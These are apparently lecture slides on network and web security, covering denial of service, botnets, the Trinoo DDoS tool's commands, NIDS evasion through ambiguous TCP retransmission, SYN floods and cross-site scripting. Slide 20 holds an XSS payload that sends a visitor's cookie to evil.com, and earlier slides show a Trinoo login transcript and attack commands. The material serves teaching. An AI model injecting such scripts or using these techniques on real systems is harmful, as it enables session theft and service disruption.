Network & WebSecurity

1. Network & WebSecurity Dina Katabi dk@mit.edu nms.csail.mit.edu/~dina

2. Denial of Service Attack (DoS) • Goal: prevents legit access to an Internet service • Mechanism: Typically tries to congest the service or bring it down • Types: can target any resource, e.g., link bandwidth, routing system, access to database • Example: attacker transmits too many packets to congest the access link of the server causing legitimate connections to suffer excessive drops and timeout

3. BotNets • A Botnet is a large collection of compromised machines controlled by an attacker • Botnets can be used to mount distributed DoS or DDoS • Machines in a botnet are compromised via Internet worms, viruses, Trojans, etc. • One can rent a Botnet of $10K machines for about $200/day

4. Unidirectional commands Coordinating communication Attack traffic A Botnet is typically organized in hierarchy Attacker Master Master Master Daemon Daemon Daemon Daemon Daemon Daemon Daemon Daemon Daemon Daemon Victim

5. Specialized software is installed on the compromised machines, e.g., Trinoo Connection to port (default 27665/tcp) attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. Kwijibo Connection closed by foreign host. . . . attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. Betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo>

6. Trin00 Commands • dos <IP> - command to initiate a DoS against the targeted <IP> address • mdos <IP1:IP2:IP3> - sends command to attack three IP addresses, sequentially • die – shut down the master • mdie <password> - if correct password specified, packet is sent out to all daemon nodes to shutdown • mping – ping sent to all nodes in the deamon list • killdead – delete deamon nodes from list that didn’t reply to ping • bcast – gives a list of all active daemons • mstop – Attempts to stop an active DoS attack. Never implemented by the author(s), but the command is there

7. Approaches to Intrusion Detection • Signature Based: Keeps a DB of known attack signatures and matches traffic against DB (e.g., Bro, Snort) • Pros • Easy to understand the outcome • More accurate in detecting known attacks • Cons • Can’t discover new attacks • Anomaly Based: Matches traffic against a model of normal traffic and flags abnormalities (e.g., EMERALD) • Pros • Can deal with new attacks • Cons • Modeling normal. it is hard to describe what is normal • Limits new applications • Less accurate detection of known attacks • Hybrid: Matches against DB of known attacks. If no match, it checks for anomaly

8. Evasion Problem in NIDS • Consider scanning traffic for a particular string (“USER root”) • Easiest: scan for the text in each packet • No good: text might be split across multiple packets • Okay, remember text from previous packet • No good: out-of-order delivery • Okay, fully reassemble byte stream • Costs state …. • …. and still evadable Source: Vern Paxson

9. Receiver Sender 15 hops 20 hops Evading Detection ViaAmbiguous TCP Retransmission NIDS

10. Receiver Attacker Evading Detection ViaAmbiguous TCP Retransmission TTL=17, seq=1 Timed out n TTL=23, seq=1 r r NIDS n or r?

11. Receiver Attacker Evading Detection ViaAmbiguous TCP Retransmission TTL=17, seq=1 Timed out n TTL=23, seq=1 r r TTL=21, seq=2 o o TTL=15, seq=2 Timed out i NIDS n or r? i or o?

12. Receiver Attacker Evading Detection ViaAmbiguous TCP Retransmission TTL=17, seq=1 Timed out n TTL=23, seq=1 r r TTL=21, seq=2 o o TTL=15, seq=2 Timed out i TTL=20, seq=3 o o TTL=19, seq=4 Timed out c TTL=27, seq=4 t t NIDS n or r? i or o? o c or t? noot? niot? rooc? nooc? nioc? riot? root? …

13. TCP SYN Flood TCP DoS Attacks: Client Server SYNC Listening Store data SYNS, ACKC Wait ACKS Connected

14. TCP SYN Flood TCP DoS Attacks: C S SYNC1 Listening SYNC2 Store data SYNC3 SYNC4 SYNC5

15. TCP SYN Flood TCP DoS Attacks: • Usually targets connection memory  Too many half-open connections • Potential victim is any TCP-based server such as a Web server, FTP server, or mail server • How can the server deal with it? • Server times out half-open connection

16. DoS Attacks on Web Servers

17. DoS Attacks on Servers: Attacks that Mimic Legitimate Traffic GET LargeFile.zip • Attacker compromises many machines causing them to flood victim with HTTP requests • Attacked resources • DB and Disk bandwidth • Socket buffers, processes, … • Dynamic content, password checking, etc. • Hard to detect; attack traffic is indistinguishable from legitimate traffic DO LongDBQuery

18. Suspected attack! To access www.foo.com enter the above letters: CAPTCH-Based Solution • Need to ensure: • Cheap ways to send test and check answer • Some people can’t or don’t want to answer graphical tests but are legitimate users (e.g., Blind users)

19. Web Attacks • Most web attacks exploit java scripts • Java scripts can appear in a web page as • <script> executable instructions </script> • The instructions between <script> instructions </script> do not appear on the web page; they get executed by the browser • If the instructions are malicious they can do a lot of harm to the client, e.g., steal web cookies • Cross-site scripting are one of the most common attack on web browsers

20. Cross-Site Scripting (XSS) • Say you have a trusted web server that accepts entries from users, • e.g.,TrustedBlog.com has a box for users to enter comments on prior blogs • Attacker can embed an executable script in his comment like: • <script> document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie; </script> • When a user browse the trusted server, the server sends the comments and the victim’s browser executes the script sending the victim’s cookie to the attacker’s site